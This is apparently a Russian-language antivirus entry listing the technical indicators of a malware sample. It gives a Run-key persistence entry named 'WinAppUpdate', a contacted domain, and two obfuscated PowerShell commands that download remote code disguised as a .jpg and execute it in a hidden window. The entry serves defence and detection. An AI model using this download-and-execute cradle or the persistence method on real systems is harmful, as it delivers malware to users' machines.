Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'WinAppUpdate' = '"%HOMEPATH%\<Имя файла>.vbs"'
- %HOMEPATH%\<Имя файла>.vbs
- 'up##0.com':443
- DNS ASK up##0.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''https://www.up##0.com/i/00194/bgc29dskq0lo.jpg'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''https://www.up##0.com/i/00194/bgc29dskq0lo.jpg'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X